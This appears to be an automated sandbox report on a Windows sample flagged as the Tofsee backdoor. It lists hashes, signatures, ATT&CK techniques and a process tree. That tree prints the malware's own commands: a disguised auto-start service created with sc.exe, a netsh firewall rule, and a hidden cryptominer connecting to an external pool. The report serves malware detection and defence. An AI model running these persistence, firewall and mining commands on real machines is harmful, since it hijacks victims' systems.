Analysis

  • max time kernel
    146s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    15-11-2020 23:13

General

  • Target

    967692708e762fda8ecb0b971aa06e33bca0b9d97b22ac7ffe8297df40a136dd.exe

  • Size

    13.0MB

  • MD5

    3c0f80a2feb1ba9cf781686c98dd6682

  • SHA1

    d0960adb4d7be498b72089a880b94ed305b9d99c

  • SHA256

    967692708e762fda8ecb0b971aa06e33bca0b9d97b22ac7ffe8297df40a136dd

  • SHA512

    b8beac88f8722f818e302b70afecf68268f8811b56c127011ac7cfe86692ec5f937f20c97c60fb0b9f2691588be5069540faf65bdd4c57e648e33a67f643587c

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 6 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\967692708e762fda8ecb0b971aa06e33bca0b9d97b22ac7ffe8297df40a136dd.exe
    "C:\Users\Admin\AppData\Local\Temp\967692708e762fda8ecb0b971aa06e33bca0b9d97b22ac7ffe8297df40a136dd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1892
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\nvcgjzia\
      2⤵
        PID:1452
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\cwyvplva.exe" C:\Windows\SysWOW64\nvcgjzia\
        2⤵
          PID:1864
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create nvcgjzia binPath= "C:\Windows\SysWOW64\nvcgjzia\cwyvplva.exe /d\"C:\Users\Admin\AppData\Local\Temp\967692708e762fda8ecb0b971aa06e33bca0b9d97b22ac7ffe8297df40a136dd.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:344
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description nvcgjzia "wifi internet conection"
            2⤵
              PID:396
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start nvcgjzia
              2⤵
                PID:1472
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                • Modifies service
                PID:1352
            • C:\Windows\SysWOW64\nvcgjzia\cwyvplva.exe
              C:\Windows\SysWOW64\nvcgjzia\cwyvplva.exe /d"C:\Users\Admin\AppData\Local\Temp\967692708e762fda8ecb0b971aa06e33bca0b9d97b22ac7ffe8297df40a136dd.exe"
              1⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:1012
              • C:\Windows\SysWOW64\svchost.exe
                svchost.exe
                2⤵
                • Deletes itself
                • Drops file in System32 directory
                • Modifies service
                • Suspicious use of SetThreadContext
                • Modifies data under HKEY_USERS
                • Suspicious use of WriteProcessMemory
                PID:1900
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1840

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Persistence

            New Service

            1
            T1050

            Modify Existing Service

            2
            T1031

            Registry Run Keys / Startup Folder

            1
            T1060

            Privilege Escalation

            New Service

            1
            T1050

            Defense Evasion

            Disabling Security Tools

            1
            T1089

            Modify Registry

            3
            T1112

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\cwyvplva.exe
              MD5

              41f36acca3fee28cc3fff21e61eb89b3

              SHA1

              71abda3a129e16de18cb6557ffd5d3f7443533a1

              SHA256

              7153bcbdd65f827e929205a1d42f1a15fb52030a0b6f70785d0073c82630fb5b

              SHA512

              f4f1b17e1c0aba092386b93c7c269ea71bfb46ba6e4ad6afb1f0af82f9b5c2a772fa683bd03690b97ef64d9bcf1bcbb92a474602bd6f59911b66b406487fb295

            • C:\Windows\SysWOW64\nvcgjzia\cwyvplva.exe
              MD5

              41f36acca3fee28cc3fff21e61eb89b3

              SHA1

              71abda3a129e16de18cb6557ffd5d3f7443533a1

              SHA256

              7153bcbdd65f827e929205a1d42f1a15fb52030a0b6f70785d0073c82630fb5b

              SHA512

              f4f1b17e1c0aba092386b93c7c269ea71bfb46ba6e4ad6afb1f0af82f9b5c2a772fa683bd03690b97ef64d9bcf1bcbb92a474602bd6f59911b66b406487fb295

            • memory/344-3-0x0000000000000000-mapping.dmp
            • memory/396-4-0x0000000000000000-mapping.dmp
            • memory/1352-10-0x0000000000000000-mapping.dmp
            • memory/1452-0-0x0000000000000000-mapping.dmp
            • memory/1472-5-0x0000000000000000-mapping.dmp
            • memory/1840-17-0x0000000000210000-0x0000000000301000-memory.dmp
              Filesize

              964KB

            • memory/1840-20-0x00000000002A259C-mapping.dmp
            • memory/1840-18-0x0000000000210000-0x0000000000301000-memory.dmp
              Filesize

              964KB

            • memory/1864-1-0x0000000000000000-mapping.dmp
            • memory/1900-8-0x00000000000C9A6B-mapping.dmp
            • memory/1900-13-0x0000000000340000-0x0000000000350000-memory.dmp
              Filesize

              64KB

            • memory/1900-14-0x0000000000660000-0x0000000000665000-memory.dmp
              Filesize

              20KB

            • memory/1900-15-0x0000000005840000-0x0000000005C4B000-memory.dmp
              Filesize

              4.0MB

            • memory/1900-16-0x0000000000670000-0x0000000000677000-memory.dmp
              Filesize

              28KB

            • memory/1900-12-0x00000000002D0000-0x00000000002D6000-memory.dmp
              Filesize

              24KB

            • memory/1900-11-0x0000000001E20000-0x000000000202F000-memory.dmp
              Filesize

              2.1MB

            • memory/1900-7-0x00000000000C0000-0x00000000000D5000-memory.dmp
              Filesize

              84KB